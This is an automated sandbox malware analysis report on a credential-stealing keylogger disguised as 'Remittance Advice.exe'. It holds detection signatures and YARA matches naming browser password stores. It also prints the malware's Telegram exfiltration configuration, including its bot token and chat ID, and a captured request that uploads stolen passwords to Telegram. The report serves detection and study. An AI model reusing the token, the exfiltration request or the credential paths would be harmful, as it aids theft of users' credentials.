Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Remittance Advice.exe

Overview

General Information

Sample name:Remittance Advice.exe
Analysis ID:1589988
MD5:667efc5a5ac024a15ce73a7a352ea598
SHA1:8b040298902662570d584fc468c8f45f35c47396
SHA256:98bd32336d5f7ccc755b7957803a881a51dafb9efad7d577befc431690469787
Tags:exeMassLoggeruser-adrian__luca
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Remittance Advice.exe (PID: 4664 cmdline: "C:\Users\user\Desktop\Remittance Advice.exe" MD5: 667EFC5A5AC024A15CE73A7A352EA598)
    • RegAsm.exe (PID: 7068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8", "Telegram Chatid": "6410945890"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xefb7:$a1: get_encryptedPassword
        • 0xf2df:$a2: get_encryptedUsername
        • 0xed52:$a3: get_timePasswordChanged
        • 0xee73:$a4: get_passwordField
        • 0xefcd:$a5: set_encryptedPassword
        • 0x10929:$a7: get_logins
        • 0x105da:$a8: GetOutlookPasswords
        • 0x103cc:$a9: StartKeylogger
        • 0x10879:$a10: KeyLoggerEventArgs
        • 0x10429:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          3.2.RegAsm.exe.630000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            3.2.RegAsm.exe.630000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              3.2.RegAsm.exe.630000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                3.2.RegAsm.exe.630000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xf1b7:$a1: get_encryptedPassword
                • 0xf4df:$a2: get_encryptedUsername
                • 0xef52:$a3: get_timePasswordChanged
                • 0xf073:$a4: get_passwordField
                • 0xf1cd:$a5: set_encryptedPassword
                • 0x10b29:$a7: get_logins
                • 0x107da:$a8: GetOutlookPasswords
                • 0x105cc:$a9: StartKeylogger
                • 0x10a79:$a10: KeyLoggerEventArgs
                • 0x10629:$a11: KeyLoggerEventArgsEventHandler
                3.2.RegAsm.exe.630000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x14163:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x13661:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x1396f:$a4: \Orbitum\User Data\Default\Login Data
                • 0x14767:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 20 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T13:05:39.008817+010020577441Malware Command and Control Activity Detected192.168.2.749712149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T13:05:31.839208+010028032742Potentially Bad Traffic192.168.2.749707193.122.130.080TCP
                2025-01-13T13:05:38.057995+010028032742Potentially Bad Traffic192.168.2.749707193.122.130.080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T13:05:38.767563+010018100081Potentially Bad Traffic192.168.2.749712149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Remittance Advice.exeAvira: detected
                Source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8", "Telegram Chatid": "6410945890"}
                Source: RegAsm.exe.7068.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendMessage"}
                Source: Remittance Advice.exeVirustotal: Detection: 73%Perma Link
                Source: Remittance Advice.exeReversingLabs: Detection: 73%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Remittance Advice.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Remittance Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49708 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2
                Source: Remittance Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: Remittance Advice.exe, 00000000.00000002.1452750531.0000000003231000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 009E5782h3_2_009E5367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 009E51B9h3_2_009E4F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 009E5782h3_2_009E56AF

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49712 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49712 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410945890&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a0aebb4d1aHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 193.122.130.0:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49708 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410945890&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a0aebb4d1aHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.000000000261E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegAsm.exe, 00000003.00000002.3925485260.00000000025B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                Source: RegAsm.exe, 00000003.00000002.3925485260.000000000264D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RegAsm.exe, 00000003.00000002.3925485260.000000000264D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                Source: RegAsm.exe, 00000003.00000002.3925485260.00000000025B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2

                System Summary

                barindex
                Source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\Remittance Advice.exeCode function: 0_2_030EE0840_2_030EE084
                Source: C:\Users\user\Desktop\Remittance Advice.exeCode function: 0_2_075416480_2_07541648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009EC1683_2_009EC168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009ECA583_2_009ECA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009E2DD13_2_009E2DD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009E7E683_2_009E7E68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009E4F083_2_009E4F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009EC3873_2_009EC387
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009EB9DC3_2_009EB9DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009EB9E03_2_009EB9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009E4EF83_2_009E4EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009E7E673_2_009E7E67
                Source: Remittance Advice.exe, 00000000.00000002.1452248422.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Remittance Advice.exe
                Source: Remittance Advice.exe, 00000000.00000002.1452750531.0000000003231000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePoses.dll, vs Remittance Advice.exe
                Source: Remittance Advice.exe, 00000000.00000002.1452750531.00000000032AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePoses.dll, vs Remittance Advice.exe
                Source: Remittance Advice.exe, 00000000.00000002.1452750531.00000000032AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Remittance Advice.exe
                Source: Remittance Advice.exe, 00000000.00000000.1446422403.0000000000F92000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNone.exe* vs Remittance Advice.exe
                Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVebinace.dll2 vs Remittance Advice.exe
                Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Remittance Advice.exe
                Source: Remittance Advice.exeBinary or memory string: OriginalFilenameNone.exe* vs Remittance Advice.exe
                Source: Remittance Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                Source: C:\Users\user\Desktop\Remittance Advice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Remittance Advice.exe.logJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: Remittance Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Remittance Advice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Remittance Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002691000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3926270561.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.00000000026AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.00000000026D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Remittance Advice.exeVirustotal: Detection: 73%
                Source: Remittance Advice.exeReversingLabs: Detection: 73%
